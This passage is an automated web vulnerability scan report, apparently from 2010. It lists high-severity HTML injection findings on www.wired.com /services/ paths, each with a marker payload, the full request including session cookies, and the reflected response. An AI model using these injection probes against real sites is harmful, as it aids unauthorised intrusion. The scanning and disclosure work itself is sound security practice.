Date: Mon, 22 Nov 2010 01:09:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_feedback974da"><a>72d8e369572 c_general">
...[SNIP]...

1.784. http://www.wired.com/services/feedback/general [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/feedback/general

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 905fe"><a>4b273f842e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/feedback/general905fe"><a>4b273f842e2 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29368
Vary: Accept-Encoding
Expires: Mon, 22 Nov 2010 01:09:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Nov 2010 01:09:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_feedback c_general905fe"><a>4b273f842e2">
...[SNIP]...

1.785. http://www.wired.com/services/feedback/letterstowriter [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/feedback/letterstowriter

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7e6f"><a>b5e2078d190 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /servicesb7e6f"><a>b5e2078d190/feedback/letterstowriter HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29384
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:12:50 GMT
Date: Mon, 22 Nov 2010 01:08:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_servicesb7e6f"><a>b5e2078d190 ss_feedback c_letterstowriter">
...[SNIP]...

1.786. http://www.wired.com/services/feedback/letterstowriter [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/feedback/letterstowriter

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c26d"><a>82b196a60f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/feedback3c26d"><a>82b196a60f8/letterstowriter HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29384
Vary: Accept-Encoding
Expires: Mon, 22 Nov 2010 01:09:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Nov 2010 01:09:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_feedback3c26d"><a>82b196a60f8 c_letterstowriter">
...[SNIP]...

1.787. http://www.wired.com/services/feedback/letterstowriter [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/feedback/letterstowriter

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3f74"><a>339771d102 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/feedback/letterstowritere3f74"><a>339771d102 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Expires: Mon, 22 Nov 2010 01:09:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Nov 2010 01:09:29 GMT
Content-Length: 29382
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_feedback c_letterstowritere3f74"><a>339771d102">
...[SNIP]...

1.788. http://www.wired.com/services/newsletters [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/newsletters

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28bfa"><a>69123ab5c3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services28bfa"><a>69123ab5c3b/newsletters HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29356
Vary: Accept-Encoding
Cache-Control: max-age=223
Expires: Mon, 22 Nov 2010 01:12:20 GMT
Date: Mon, 22 Nov 2010 01:08:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services28bfa"><a>69123ab5c3b ss_newsletters">
...[SNIP]...

1.789. http://www.wired.com/services/newsletters [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/newsletters

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57f84"><a>3318db1ec93 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/newsletters57f84"><a>3318db1ec93 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29356
Vary: Accept-Encoding
Expires: Mon, 22 Nov 2010 01:09:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Nov 2010 01:09:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_newsletters57f84"><a>3318db1ec93">
...[SNIP]...

1.790. http://www.wired.com/services/press/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/press/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6749"><a>f428b40f49e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /servicese6749"><a>f428b40f49e/press/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29345
Vary: Accept-Encoding
Cache-Control: max-age=228
Expires: Mon, 22 Nov 2010 01:13:04 GMT
Date: Mon, 22 Nov 2010 01:09:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_servicese6749"><a>f428b40f49e ss_press">
...[SNIP]...

1.791. http://www.wired.com/services/press/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/press/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55a33"><a>35aa5f03801 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/press55a33"><a>35aa5f03801/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29345
Vary: Accept-Encoding
Expires: Mon, 22 Nov 2010 01:09:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Nov 2010 01:09:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_press55a33"><a>35aa5f03801">
...[SNIP]...

1.792. http://www.wired.com/services/privacy/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/privacy/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6245"><a>f225322a9f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /servicesc6245"><a>f225322a9f4/privacy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29349
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:12:48 GMT
Date: Mon, 22 Nov 2010 01:08:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_servicesc6245"><a>f225322a9f4 ss_privacy">
...[SNIP]...

1.793. http://www.wired.com/services/privacy/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/privacy/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 174e6"><a>9e726a36c25 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/privacy174e6"><a>9e726a36c25/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29349
Vary: Accept-Encoding
Expires: Mon, 22 Nov 2010 01:09:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Nov 2010 01:09:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_privacy174e6"><a>9e726a36c25">
...[SNIP]...

1.794. http://www.wired.com/services/rss/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/rss/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f307"><a>0464dae629d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services4f307"><a>0464dae629d/rss/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29341
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:13:18 GMT
Date: Mon, 22 Nov 2010 01:09:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services4f307"><a>0464dae629d ss_rss">
...[SNIP]...

1.795. http://www.wired.com/services/rss/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/rss/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4dae"><a>7300f743ad1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/rsse4dae"><a>7300f743ad1/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Expires: Mon, 22 Nov 2010 01:09:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Nov 2010 01:09:54 GMT
Content-Length: 29341
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_rsse4dae"><a>7300f743ad1">
...[SNIP]...

1.796. http://www.wired.com/services/sitemap/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/sitemap/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 384c1"><a>443f226f7b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services384c1"><a>443f226f7b7/sitemap/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29349
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:12:56 GMT
Date: Mon, 22 Nov 2010 01:08:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services384c1"><a>443f226f7b7 ss_sitemap">
...[SNIP]...

1.797. http://www.wired.com/services/sitemap/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/sitemap/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c0c7"><a>5bf57712b5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/sitemap7c0c7"><a>5bf57712b5c/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29349
Vary: Accept-Encoding
Expires: Mon, 22 Nov 2010 01:09:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Nov 2010 01:09:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_sitemap7c0c7"><a>5bf57712b5c">
...[SNIP]...

1.798. http://www.wired.com/services/staff/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/staff/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e86ba"><a>1fdeb759811 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /servicese86ba"><a>1fdeb759811/staff/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29345
Vary: Accept-Encoding
Cache-Control: max-age=217
Expires: Mon, 22 Nov 2010 01:12:48 GMT
Date: Mon, 22 Nov 2010 01:09:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_servicese86ba"><a>1fdeb759811 ss_staff">
...[SNIP]...

1.799. http://www.wired.com/services/staff/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/staff/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56f7e"><a>3b00f27932b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/staff56f7e"><a>3b00f27932b/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Expires: Mon, 22 Nov 2010 01:09:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 22 Nov 2010 01:09:51 GMT
Content-Length: 29345
Connection: close


